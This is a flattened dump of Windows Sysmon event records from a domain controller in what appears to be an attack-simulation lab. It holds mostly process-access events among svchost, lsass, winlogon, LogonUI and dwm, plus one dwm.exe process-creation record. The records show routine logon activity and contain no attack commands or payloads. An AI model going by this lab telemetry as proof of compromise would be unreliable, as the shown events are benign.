13:58:15.524{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009783Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.524{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009782Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.524{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009781Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.524{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009780Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.524{59A5CD1D-8E46-6005-1600-00000000A301}15442212C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-EA04-00000000A301}1372C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009779Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.524{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-EA04-00000000A301}1372C:\Windows\system32\dwm.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009778Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.477{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009777Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.477{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009776Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.477{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009775Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.477{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009774Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.477{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009773Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.477{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009772Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.477{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009771Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.477{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009770Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.477{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009769Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.461{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009768Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.461{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009767Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.461{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009766Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.461{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009765Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.461{59A5CD1D-93F6-6005-E604-00000000A301}48881684C:\Windows\system32\csrss.exe{59A5CD1D-93F7-6005-EA04-00000000A301}1372C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009764Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.461{59A5CD1D-93F6-6005-E704-00000000A301}45721312C:\Windows\system32\winlogon.exe{59A5CD1D-93F7-6005-EA04-00000000A301}1372C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\SYSTEM32\dwminit.dll+2d11|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009763Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.472{59A5CD1D-93F7-6005-EA04-00000000A301}1372C:\Windows\System32\dwm.exe10.0.14393.0 (rs1_release.160715-1616)Desktop Window ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationdwm.exe"dwm.exe"C:\Windows\system32\Window Manager\DWM-2{59A5CD1D-93F7-6005-C7AE-2B0000000000}0x2baec72SystemMD5=C89F159A577F19F7F03C73C98D29D841,SHA256=B3E37997C1C62DD90D69EF83D6A6FC782BF9A5B8AD04A0D1528A8B7FA31AA408,IMPHASH=DDB7DE3741333EE031929A760FCD4542{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\System32\winlogon.exewinlogon.exe 10341000x80000000000000009762Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.461{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1c030|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009761Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.461{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009760Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.461{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009759Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.446{59A5CD1D-8E46-6005-1600-00000000A301}15442212C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009758Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.446{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 